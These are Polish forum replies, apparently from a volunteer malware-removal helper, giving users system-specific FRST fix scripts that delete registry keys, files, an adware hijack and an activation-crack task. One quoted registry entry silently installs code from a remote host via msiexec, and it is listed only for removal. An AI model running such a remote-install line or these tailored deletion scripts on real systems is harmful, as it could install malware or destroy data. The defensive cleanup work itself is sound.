(x86)\Maoha\JiSuZip\JZipExt.dll -> Brak pliku BHO: VKOKAdBlock -> {FF20459C-DA6E-41A7-80BC-8F4FEFD9C575} -> C:\Program Files (x86)\VKOKAblockIE\t7XYIfbUR.dll => Brak pliku HKU\S-1-5-21-1768268483-3808830105-315920841-1000\Software\Microsoft\Internet Explorer\Main,Start Page = GroupPolicy: Ograniczenia - Chrome FirewallRules: [{48B34065-295C-4828-9BE8-083D0598A8EB}] => (Allow) C:\Windows\system32\rundll32.exe FirewallRules: [{63460BFC-9796-4764-BE1A-06D9E1ADE21B}] => (Allow) C:\Windows\System32\rundll32.exe FirewallRules: [{B09F3E96-572A-44DA-8AEF-7460A7D94F2F}] => (Allow) C:\Windows\System32\rundll32.exe FirewallRules: [{49D76C2E-8733-40AF-85CD-707349E02C6C}] => (Allow) C:\Windows\System32\rundll32.exe FirewallRules: [{80F63EEC-7473-4A05-A2C0-469F2DC1E9AF}] => (Allow) C:\Windows\System32\rundll32.exe DeleteKey: HKCU\Software\MozillaPlugins DeleteKey: HKLM\SOFTWARE\MozillaPlugins DeleteKey: HKLM\SOFTWARE\Wow6432Node\Google\Chrome\Extensions DeleteKey: HKLM\SOFTWARE\Wow6432Node\MozillaPlugins C:\Program Files (x86)\GUT2CF9.tmp C:\Program Files (x86)\UCBrowser C:\Program Files\Windows Media Player\SYKUMONAG79KUXM4N3QUV5440 C:\ProgramData\WindowsVideoErrorReporting C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Dragon Age Początek\Centrum pomocy produktów EA.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Dragon Age Początek\Przeglądaj plik Readme.lnk C:\ProgramData\Microsoft\Windows\GameExplorer\{CF057CC4-4F39-42AF-A61E-6B4DE25C7AF2} C:\ProgramData\Microsoft\Windows\GameExplorer\{C7BFE639-CE26-4F2C-9239-76541CCB0933} C:\Users\Admin\AppData\Local\installer.dat C:\Users\Admin\AppData\Local\test_db_cara.db C:\Users\Admin\AppData\Local\TroubleshooterConfig.json C:\Users\Admin\AppData\Local\{12A8CCFE-3C33-4995-BAD8-074E4C5B22FD} C:\Users\Admin\AppData\Local\cfd39f6f03fe4cc399a0c58897b84128 C:\Users\Admin\AppData\LocalLow\VKOK C:\Users\Admin\AppData\Roaming\aa59a429f78e41c1afe07429c433b20c C:\Users\Admin\AppData\Roaming\2676253838a14647bbb331a1744e4bec C:\Users\Admin\AppData\Roaming\1a7fa33c17c847c4aee3a60ba065f9c6 C:\Users\Admin\AppData\Roaming\cc8a6a80f7fd4a7aadc900c39a1609f7 C:\Users\Admin\AppData\Roaming\02e8a25c1de946749c7ef6d2dcdd74a0 C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Extensions\cockmkcmoohjkdpaiglfomnfapioccfd C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Extensions\pbdpajcdgknpendpmecafmopknefafha C:\Users\Admin\Desktop\Gmail.lnk C:\Users\Admin\Desktop\games\Mass Effect.lnk C:\Users\Admin\Desktop\games\McAfee Security Scan Plus.lnk C:\Windows\System32\drivers\cryptfd.sys C:\Windows\System32\Tasks\Hafez Video Converter C:\Windows\System32\Tasks\SMW_UpdateTask_Time_313538383034363130352d3437415a556c2a3223346c41 Hosts: EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Z klawiatury CTRL+S, by zapisać zmiany. Następnie przejdź w Tryb awaryjny Windows, uruchom FRST i klik w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu, opuść Tryb awaryjny. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 3. W Operze CTRL+SHIFT+E i na liście rozszerzeń sprawdź co się wyświetla. Jeśli widać tam dwa dziwne rozszerzenia, odinstaluj. 4. Zrób nowy log FRST z opcji Skanuj (Scan), bez Shortcut. Dołącz też plik fixlog.txt.

Skoro nie używany, to usunie go poniższy skrypt. Uruchom FRST. Z klawiatury CTRL+Y, zostanie otworzony plik fixlist.txt. Wklej do pliku następującą treść: CloseProcesses: Task: {99839982-7126-4C82-B5B4-8B7145035B16} - System32\Tasks\AutoKMS => C:\Windows\AutoKMS\AutoKMS.exe [2015-01-03] () RemoveDirectory: C:\AdwCleaner RemoveDirectory: C:\FRST\Quarantine RemoveDirectory: C:\Users\GOKUiSOUNF\Doctor Web RemoveDirectory: C:\Windows\AutoKMS Z klawiatury CTRL+S, by zapisać zmiany. Następnie w oknie FRST klik w Napraw (Fix). Nastąpi restart. Przedstaw wynikowy fixlog.txt. I wypowiedz się czy po usuwaniu nadal są zgłoszenia AVG.

Skasuj z dysku plik C:\delfix.txt. To wszystko.

Oznak infekcji tu nie widzę. Nie jest natomiast wykluczone, że to zgłoszenie może być powiązane z aktywnością cracka aktywacji - AVG go bardzo nie lubi. Czy ten crack jest nadal w użytku? Task: {99839982-7126-4C82-B5B4-8B7145035B16} - System32\Tasks\AutoKMS => C:\Windows\AutoKMS\AutoKMS.exe [2015-01-03] () PS. I możesz wykonać kosmetyczny skrypt usuwający wpisy szczątkowe, schowany w spoilerze:

Czy to zachowanie nadal ma miejsce po użyciu skryptu FRST? Większość zadań wykonana, ale pojawiły się nowe wpisy. Poprawki: 1. Uruchom FRST. Z klawiatury CTRL+Y, zostanie otworzony plik fixlist.txt. Wklej do pliku następującą treść: HKU\S-1-5-21-489643024-731826354-959299013-1000\...\Policies\system: [shell] explorer.exe,msiexec.exe /i hxxp://point.ltdmsjq.com/?data=zDlkMj1YMTNWMUUdRTLXMjZQRUFcNjNLMWVSFjHyMUVLRTFdFc== /q S1 iSafeKrnlMon; \??\C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlMon.sys [X] ShortcutWithArgument: C:\Users\Lambert\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer (64-bit).lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.yeadesktop.com/ ShortcutWithArgument: C:\Users\Lambert\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk -> C:\Program Files (x86)\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.yeadesktop.com/ ShortcutWithArgument: C:\Users\Lambert\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet-Explorer Browser.lnk -> C:\Program Files (x86)\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.yeadesktop.com/ DeleteKey: HKLM\SOFTWARE\Wow6432Node\Mozilla\Thunderbird RemoveDirectory: C:\AdwCleaner RemoveDirectory: C:\FRST\Quarantine RemoveDirectory: C:\Users\Lambert\Downloads\FRST-OlderVersion StartBatch: del /q C:\Users\Lambert\Desktop\adwcleaner*.* del /q C:\Users\Lambert\Downloads\adwcleaner*.* del /q C:\Users\Lambert\Downloads\qd1y4yyr.exe del /q C:\Users\Lambert\Downloads\SPTDinst-v189-x64.exe del /q C:\Windows\system32\Drivers\iSafeKrnlBoot.sys del /q C:\Windows\system32\Drivers\iSafeNetFilter.sys EndBatch: Z klawiatury CTRL+S, by zapisać zmiany. Następnie w oknie FRST klik w Napraw (Fix). Przedstaw wynikowy fixlog.txt. 2. Spróbuj ponowić usuwanie wyszukiwarki mystarting123.com z Google Chrome. 3. Pobierz z przyklejonego najnowszą wersję AdwCleaner. Następnie uruchom w nim czyszczenie i dostarcz log wynikowy z folderu C:\AdwCleaner.

1. AdwCleaner wykrył jeszcze inne odpadki adware - uruchom go ponownie i tym razem zastosuj po kolei opcje Skanuj + Oczyść. Gdy program ukończy zadanie: 2. Przez SHIFT+DEL (omija Kosz) skasuj FRST z katalogu D:\Programy\skanowanie komputera i raporty. Następnie zastosuj DelFix. To wszystko.

W tej sytuacji dostarcz chociaż podfolder z rozszerzeniami: C:\Users\tom615\AppData\Roaming\Opera Software\Opera Stable\Extensions Czy zaznaczyłeś opcję usuwania "danych użytkownika" podczas deinstalacji? Na wszelki wypadek możesz zastosować skrypt do FRST usuwający szczątki: DeleteKey: HKCU\Software\Google DeleteKey: HKLM\SOFTWARE\Wow6432Node\Google RemoveDirectory: C:\Program Files (x86)\Google RemoveDirectory: C:\Users\tom615\AppData\Local\Google RemoveDirectory: C:\FRST\Quarantine

Wszystko pomyślnie wykonane, adware usunięte. Teraz poprawki: 1. Uruchom FRST. Z klawiatury CTRL+Y, zostanie otworzony plik fixlist.txt. Wklej do pliku następującą treść: DeleteKey: HKLM\SOFTWARE\Mozilla DeleteKey: HKLM\SOFTWARE\WOW6432Node\Eggper DeleteKey: HKLM\SOFTWARE\WOW6432Node\Firefox DeleteKey: HKLM\SOFTWARE\WOW6432Node\Mozilla DeleteKey: HKU\S-1-5-21-570807183-2887973835-1248124564-1000\SOFTWARE\Classes\ftp DeleteKey: HKU\S-1-5-21-570807183-2887973835-1248124564-1000\SOFTWARE\Classes\http DeleteKey: HKU\S-1-5-21-570807183-2887973835-1248124564-1000\SOFTWARE\Classes\https DeleteKey: HKU\S-1-5-21-570807183-2887973835-1248124564-1000\SOFTWARE\Classes\irc DeleteKey: HKU\S-1-5-21-570807183-2887973835-1248124564-1000\SOFTWARE\Classes\mailto DeleteKey: HKU\S-1-5-21-570807183-2887973835-1248124564-1000\SOFTWARE\Classes\mms DeleteKey: HKU\S-1-5-21-570807183-2887973835-1248124564-1000\SOFTWARE\Classes\news DeleteKey: HKU\S-1-5-21-570807183-2887973835-1248124564-1000\SOFTWARE\Classes\nntp DeleteKey: HKU\S-1-5-21-570807183-2887973835-1248124564-1000\SOFTWARE\Classes\sms DeleteKey: HKU\S-1-5-21-570807183-2887973835-1248124564-1000\SOFTWARE\Classes\smsto DeleteKey: HKU\S-1-5-21-570807183-2887973835-1248124564-1000\SOFTWARE\Classes\tel DeleteKey: HKU\S-1-5-21-570807183-2887973835-1248124564-1000\SOFTWARE\Classes\urn DeleteKey: HKU\S-1-5-21-570807183-2887973835-1248124564-1000\SOFTWARE\Classes\webcal DeleteKey: HKU\S-1-5-21-570807183-2887973835-1248124564-1000\SOFTWARE\Eggper DeleteKey: HKU\S-1-5-21-570807183-2887973835-1248124564-1000\SOFTWARE\Firefox DeleteKey: HKU\S-1-5-21-570807183-2887973835-1248124564-1000\SOFTWARE\Mozilla DeleteKey: HKU\S-1-5-21-570807183-2887973835-1248124564-1000\SOFTWARE\Microsoft\Internet Explorer\LowRegistry\Audio\PolicyConfig\PropertyStore\37de59f2_0 DeleteKey: HKU\S-1-5-21-570807183-2887973835-1248124564-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Search\RecentApps\{1A49764D-CF78-4AD5-94D6-68A341A9ECCC} DeleteValue: HKU\S-1-5-21-570807183-2887973835-1248124564-1000\SOFTWARE\Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache|C:\Program Files (x86)\Firefox\Firefox.exe.FriendlyAppName DeleteValue: HKU\S-1-5-21-570807183-2887973835-1248124564-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility Assistant\Store|C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe DeleteValue: HKU\S-1-5-21-570807183-2887973835-1248124564-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility Assistant\Store|C:\Program Files (x86)\Firefox\uninstall\helper.exe U2 CSHMDR; Brak ImagePath U2 CWASRE; Brak ImagePath U2 snare; Brak ImagePath U2 WinSnare; Brak ImagePath RemoveDirectory: C:\FRST\Quarantine CMD: del /q "C:\Users\MI\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Powiadomienia monitorowania tuszu - .lnk" Z klawiatury CTRL+S, by zapisać zmiany. Następnie w oknie FRST klik w Napraw (Fix). Przedstaw wynikowy fixlog.txt. 2. Uruchom AdwCleaner. Wybierz opcję Skanuj i dostarcz log wynikowy z folderu C:\AdwCleaner.

Onaczenie LEGO Batman 3 Beyond Gotham version 1.0 znacznikiem "UWAGA" to fałszywy alarm. Poprawki: 1. W Google Chrome odinstaluj rozszerzenie Chrome Cleaner Pro. To mocno podejrzane rozszerzenie, które zostało zainstalowane tutaj definitywnie z zewnętrznego instalatora a nie bezpośrednio via Chrome Web Store (instalator na poziomie rejestru) i w międzyczasie instalator w rejestrze przeładował to rozszerzenie. Poza tym, AdwCleaner wykrywa jego identyfikator. 2. Usunięcie wpisu "PUP" od paczki montującej Bing Microsoftu i kilku pustych wpisów. Uruchom FRST. Z klawiatury CTRL+Y, zostanie otworzony plik fixlist.txt. Wklej do pliku następującą treść: MSCONFIG\Services: AdvancedSystemCareService9 => 2 MSCONFIG\Services: LiveUpdateSvc => 2 MSCONFIG\Services: MozillaMaintenance => 3 MSCONFIG\Services: Steam Client Service => 3 HKLM\...\StartupApproved\StartupFolder: => "fcbd.bat" HKLM\...\StartupApproved\Run: => "NvBackend" HKLM\...\StartupApproved\Run32: => "AVG_UI" HKU\S-1-5-21-3274260535-2468400652-3968369242-1000\...\StartupApproved\Run: => "BingSvc" HKU\S-1-5-21-3274260535-2468400652-3968369242-1000\...\StartupApproved\Run: => "DriverMax_RESTART" HKU\S-1-5-21-3274260535-2468400652-3968369242-1000\...\StartupApproved\Run: => "EvolveClient" HKU\S-1-5-21-3274260535-2468400652-3968369242-1000\...\StartupApproved\Run: => "DAEMON Tools Lite Automount" HKU\S-1-5-21-3274260535-2468400652-3968369242-1000\...\StartupApproved\Run: => "EADM" HKU\S-1-5-21-3274260535-2468400652-3968369242-1000\...\StartupApproved\Run: => "ALLPlayer WiFi Remote" HKU\S-1-5-18\...\Run: [script_fcbd] => "F:\Origin Gry\Far Cry 3 Blood Dragon\fcbd.bat" HKLM Group Policy restriction on software: %systemroot%\system32\mrt.exe HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Ograniczenia Task: {493BB10B-9485-47C0-8812-1BB126C609F5} - System32\Tasks\ASC9_SkipUac_tom615 => C:\Program Files (x86)\IObit\Advanced SystemCare\ASC.exe Task: {7CAACDB1-BB7D-4F58-9581-9A0F25E47FF0} - System32\Tasks\ASC9_PerformanceMonitor => C:\Program Files (x86)\IObit\Advanced SystemCare\Monitor.exe CHR HKLM-x32\...\Chrome\Extension: [ccjleegmemocfpghkhpjmiccjcacackp] - hxxps://clients2.google.com/service/update2/crx CHR HKLM-x32\...\Chrome\Extension: [eofcbnmajmjmplflapaojjnihcjkigck] - C:\Program Files\AVAST Software\Avast\WebRep\Chrome\aswWebRepChromeSp.crx CHR HKLM-x32\...\Chrome\Extension: [gomekmidlodglbbmalcneegieacbdmki] - C:\Program Files\AVAST Software\Avast\WebRep\Chrome\aswWebRepChrome.crx DeleteKey: HKLM\SOFTWARE\Classes\Interface\{3bbe95d4-c53f-11d1-b3a2-00a0c9083365} Folder: C:\ProgramData\SWCUTemp C:\ProgramData\SWCUTemp C:\Users\tom615\AppData\Local\Microsoft\BingSvc Z klawiatury CTRL+S, by zapisać zmiany. Następnie w oknie FRST klik w Napraw (Fix). Przedstaw wynikowy fixlog.txt. Żaden z przetworzonych wpisów nie miał związku z przeglądarką Opera. Jeśli problem nadal występuje i tylko w tej przeglądarce (z wyłączeniem Edge, Chrome i Internet Explorer), prawdopodobnie problemem jest jakiś zainfekowany element w Operze, np. któreś z zainstalowanych rozszerzeń ma wstawiony szkodliwy skrypt (niewykrywalny na poziomie raportów FRST). Teoretycznie nie ma tu nic podejrzanego: Opera: ======= OPR StartupUrls: OPR Extension: (AdBlock) - C:\Users\tom615\AppData\Roaming\Opera Software\Opera Stable\Extensions\aobdicepooefnbaeokijohmhjlleamfj [2016-05-16] OPR Extension: (Ghostery) - C:\Users\tom615\AppData\Roaming\Opera Software\Opera Stable\Extensions\bbkekonodcdmedgffkkbgmnnekbainbg [2017-06-02] OPR Extension: (uBlock Origin) - C:\Users\tom615\AppData\Roaming\Opera Software\Opera Stable\Extensions\cjpalhdlnbpafiamejdnhcphjbkeiagm [2017-05-17] OPR Extension: (Translator) - C:\Users\tom615\AppData\Roaming\Opera Software\Opera Stable\Extensions\cnbpedcoekjafichoehopgaaldogogch [2016-12-14] OPR Extension: (Avast Online Security) - C:\Users\tom615\AppData\Roaming\Opera Software\Opera Stable\Extensions\daanglpcpkjjlkhcbladppjphglbigam [2017-06-01] OPR Extension: (Tampermonkey) - C:\Users\tom615\AppData\Roaming\Opera Software\Opera Stable\Extensions\dhdgffkkebhmkfjojejmpbldmpobfkfo [2017-06-01] OPR Extension: (HTTPS Everywhere) - C:\Users\tom615\AppData\Roaming\Opera Software\Opera Stable\Extensions\edaplhobcmdaneconioghljnnopmkhgm [2017-06-06] OPR Extension: (Free Flash, Unity3D and html5 games) - C:\Users\tom615\AppData\Roaming\Opera Software\Opera Stable\Extensions\egjicgmgibgofmekojoaaddjkagfajjh [2016-06-21] OPR Extension: (Download Chrome Extension) - C:\Users\tom615\AppData\Roaming\Opera Software\Opera Stable\Extensions\kipjbhgniklcnglfaldilecjomjaddfi [2017-02-10] OPR Extension: (Force Download) - C:\Users\tom615\AppData\Roaming\Opera Software\Opera Stable\Extensions\klahcccondnnonafcbcdgbahphglbjjg [2016-08-08] OPR Extension: (Dr.Web Link Checker) - C:\Users\tom615\AppData\Roaming\Opera Software\Opera Stable\Extensions\kokchgogfgeiahpenhpekopebfikfhil [2016-04-30] OPR Extension: (Pogoda) - C:\Users\tom615\AppData\Roaming\Opera Software\Opera Stable\Extensions\lnejmennopimdkhecilfhkmmjolebocd [2017-03-28] Skopiuj folder C:\Users\tom615\AppData\Roaming\Opera Software\Opera Stable, spakuj do ZIP, shostuj gdzieś i podaj link do paczki.

Temat przenoszę do działu Windows. Problemy nie wyglądają na pochodną infekcji, brak aktywnych obiektów adware/malware, tylko drobne szczątki które nie mają wpływu na opisywane objawy. vs. Dziennik System: ============= Error: (06/06/2017 03:21:08 PM) (Source: BugCheck) (EventID: 1001) (User: ) Description: Nastąpił ponowny rozruch komputera po operacji wykrywania błędów. Wyniki tej operacji były następujące: 0x000000d1 (0x0000000000000000, 0x0000000000000002, 0x0000000000000000, 0xfffff8800205ce00). Zrzut zapisano w: C:\Windows\MEMORY.DMP. Identyfikator raportu: 060617-27968-01. Error: (06/06/2017 03:21:05 PM) (Source: EventLog) (EventID: 6008) (User: ) Description: Poprzednie zamknięcie systemu przy 23:41:46 na ‎2017-‎06-‎05 było nieoczekiwane. Dostarcz pliki DMP: KLIK (punkt 5). Natomiast ja tu nie widzę wielu doinstalowanych wtórnie programów, z wyłączeniem aplikacji preintegrowanych przez producenta. Z raportów nic też konkretnego nie wynika. Na razie zadaję tylko podstawowe czynności: 1. Odinstaluj zbędne programy zainstalowane w charakterze sponsorów oraz starą przeglądarkę: AVG Web TuneUp, Intel Security True Key, McAfee Security Scan Plus, Mozilla Firefox 38.0.1 (x86 en-US), Mozilla Maintenance Service. Nie są także potrzebne wtyczki Flash Adobe Flash Player 25 NPAPI, Adobe Flash Player 25 PPAPI - Chrome ma wbudowany natywny Flash. Zakładam, że Firefox zostanie odinstalowany, gdyż skrypt w punkcie 2 usunie pozostałości Firefox. 2. W spoilerze doczyszczanie wpisów szczątkowych: 3. Zrób nowy log FRST z opcji Skanuj (Scan), bez Shortcut. Dołącz też plik fixlog.txt.